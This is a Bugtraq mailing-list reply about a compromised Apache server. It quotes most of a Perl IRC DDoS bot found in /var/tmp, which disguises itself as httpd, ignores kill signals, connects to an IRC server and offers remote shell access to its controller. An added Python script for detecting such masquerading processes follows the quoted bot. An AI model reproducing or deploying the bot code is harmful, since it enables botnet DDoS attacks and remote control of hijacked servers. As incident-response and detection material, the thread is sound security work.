Bugtraq mailing list archives
Re: Apache hacks (./atac, d0s.txt)
From: Daniel Cid <danielcid () yahoo com br>
Date: Sat, 30 Apr 2005 01:48:12 -0300 (ART)
Take a look at these links:

http://lists.virus.org/full-disclosure-0412/msg00541.html
http://seclists.org/lists/fulldisclosure/2005/Jan/0051.html

Are your systems patched (apache)? Do you run any application that might be vulnerable?

One thing I know is that this perl script is clearly made by some Brazilian people..

--
Daniel B. Cid, CISSP
daniel.cid @ ( at ) gmail.com

--- Andrew Y Ng <ayn () AndrewNg com> wrote:
My server has been seeing some unusual activities today, I don't have much time to get down to the bottom of things, but after I investigated briefly I have decided to disable PERL executable permission for www-data (Apache process's user), also locked /var/tmp so www-data cannot write to it.

Looks like it ignores all the `kill` signals, not sure how I can actually kill it...

I found the included script in /var/tmp called d0s.txt. I found a bunch of processes called ./atac 20 running, and found the following content in /tmp/atac: http://andrewng.com/tmp/atac.tbz

here's d0s.txt:

#!/usr/bin/perl
################ CONFIGURATION
#################################################################
my $processo = '/usr/local/apache/bin/httpd -DSSL'; # Process name that will show up in ps #
#----------------------------------------------################################################
my $MODOME='+pi'; # Bot mode #
#----------------------------------------------################################################
my $linas_max='10'; # Avoids flooding :) after X lines #
#----------------------------------------------################################################
my $sleep='3'; # it sleeps X seconds #
##################### IRC
#####################################################################
my @adms=("DDOS"); # Administrator's nick #
#----------------------------------------------################################################
my @canais=("#bots ddos");# Channels #
#----------------------------------------------################################################
my $nick='b0t'; # Bot nick. If it is already in use it will #
                # appear with a random number at the end #
#----------------------------------------------################################################
my $ircname = 'b0t'; # User ID #
#----------------------------------------------################################################
my $realname = '4Admin14: 4#DDOS'; #
#----------------------------------------------################################################
$servidor='irc.gigachat.net' unless $servidor; # IRC server to be used #
                                               # if none is given as argument #
#----------------------------------------------################################################
my $porta='6667'; # IRC server port #
################ SHELL ACCESS
###############################################################
my $secv = 1; # 1/0 to enable/disable shell access #
###############################################################################################
my $VERSAO = '1.0';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

use IO::Socket;
use Socket;
use IO::Select;
chdir("/");

$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();

sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
    print $IRC_cur_socket "$_[0]\n";
  }
}

sub conectar {
  my $meunick = $_[0];
  my $servidor_con = $_[1];
  my $porta_con = $_[2];
  my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
  if (defined($IRC_socket)) {
    $IRC_cur_socket = $IRC_socket;
    $IRC_socket->autoflush(1);
    $sel_cliente->add($IRC_socket);
    $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
    $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
    nick("$meunick");
    sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
    sleep 1;
  }
}

my $line_temp;
while( 1 ) {
  while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
  delete($irc_servers{''}) if (defined($irc_servers{''}));
  &DCC::connections;
  my @ready = $sel_cliente->can_read(0);
  next unless(@ready);
  foreach $fh (@ready) {
    $IRC_cur_socket = $fh;
    $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
    $nread = sysread($fh, $msg, 4096);
    if ($nread == 0) {
      $sel_cliente->remove($fh);
      $fh->close;
      delete($irc_servers{$fh});
    }
    @lines = split (/\n/, $msg);
    for(my $c=0; $c<= $#lines; $c++) {
      $line = $lines[$c];
      $line=$line_temp.$line if ($line_temp);
      $line_temp='';
      $line =~ s/\r$//;
      unless ($c == $#lines) {
        parse("$line");
      } else {
        if ($#lines == 0) {
          parse("$line");
        } elsif ($lines[$c] =~ /\r$/) {
          parse("$line");
        } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
          parse("$line");
        } else {
          $line_temp = $line;
        }
      }
    }
  }
}

sub parse {
  my $servarg = shift;
  if ($servarg =~ /^PING \:(.*)/) {
    sendraw("PONG :$1");
  } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
    my $pn=$1;
    my $onde = $4;
    my $args = $5;
    if ($args =~ /^\001VERSION\001$/) {
      notice("$pn", "\001Bot powered by DDOS TEAM\001");
    }
    if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
      if ($onde eq "$meunick"){
        shell("$pn", "$args");
      }
      if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/ ) {
=== message truncated ===
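The script above hides from `ps` by rewriting `$0` to an httpd-looking string and ignores INT/HUP/TERM, which is why Andrew's `kill` had no effect. Here is an added detection example, not part of the thread, that walks a /proc-like tree and flags processes whose argv[0] claims one program while /proc/<pid>/exe points at an interpreter; the interpreter list and the argv[0] parsing rules are this example's own assumptions.

```python
"""Spot processes whose advertised command line does not match their binary.

The posted bot rewrites $0 to '/usr/local/apache/bin/httpd -DSSL' padded
with NULs, so `ps` shows Apache while /proc/<pid>/exe still points at perl.
"""
import os
from pathlib import Path

# Interpreters a script-based bot is actually executed by (assumption).
INTERPRETERS = ("perl", "python", "ruby", "sh", "bash")


def is_masquerading(cmdline: bytes, exe_path: str) -> bool:
    """True when argv[0] names one program but the mapped executable is an
    interpreter, i.e. a script pretending to be a daemon binary."""
    # /proc/<pid>/cmdline is NUL-separated; the bot pads argv[0] with 16 NULs
    argv0 = cmdline.split(b"\0", 1)[0].decode(errors="replace").strip()
    if not argv0:
        return False  # kernel threads and exited processes have no argv
    claimed = os.path.basename(argv0.split()[0])
    real = os.path.basename(exe_path)  # readlink target, e.g. /usr/bin/perl
    return real.startswith(INTERPRETERS) and not claimed.startswith(INTERPRETERS)


def scan_proc(proc_root: str = "/proc") -> list:
    """Return (pid, claimed argv[0], real exe) for every mismatched process
    under a /proc-like tree; entries that cannot be read are skipped."""
    hits = []
    for entry in Path(proc_root).iterdir():
        if not entry.name.isdigit():
            continue
        try:
            cmdline = (entry / "cmdline").read_bytes()
            exe = os.readlink(entry / "exe")
        except OSError:
            continue  # no permission, or the process is already gone
        if is_masquerading(cmdline, exe):
            argv0 = cmdline.split(b"\0", 1)[0].decode(errors="replace")
            hits.append((int(entry.name), argv0, exe))
    return hits


if __name__ == "__main__":
    # The script sets $SIG{TERM}/HUP/INT to IGNORE, which is why a plain
    # `kill` does nothing; SIGKILL cannot be ignored. This only reports.
    for pid, claimed, real in scan_proc():
        print(f"pid {pid}: claims {claimed!r} but runs {real}")
```

Run it as root so /proc/<pid>/exe of other users' processes is readable; a legitimate perl script started as `perl script.pl` is not flagged because argv[0] and exe agree.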
Current thread:
- Re: Apache hacks (./atac, d0s.txt) a.list.address () gmail com (May 02)
- Re: Apache hacks (./atac, d0s.txt) Nick Bright (May 02)
- <Possible follow-ups>
- Re: Apache hacks (./atac, d0s.txt) Chris Umphress (May 02)
- Re: Apache hacks (./atac, d0s.txt) Sagiko (May 02)
- Re: Apache hacks (./atac, d0s.txt) Daniel Cid (May 02)
- Re: Apache hacks (./atac, d0s.txt) Luiz Henrique (May 02)
- Re: Apache hacks (./atac, d0s.txt) Skip Carter (May 02)
- Re: Apache hacks (./atac, d0s.txt) Robert Zilbauer (May 02)
- Re: Apache hacks (./atac, d0s.txt) KF (lists) (May 02)
- Re: Apache hacks (./atac, d0s.txt) Jay D. Dyson (May 02)
- Re: Apache hacks (./atac, d0s.txt) Steve Kemp (May 02)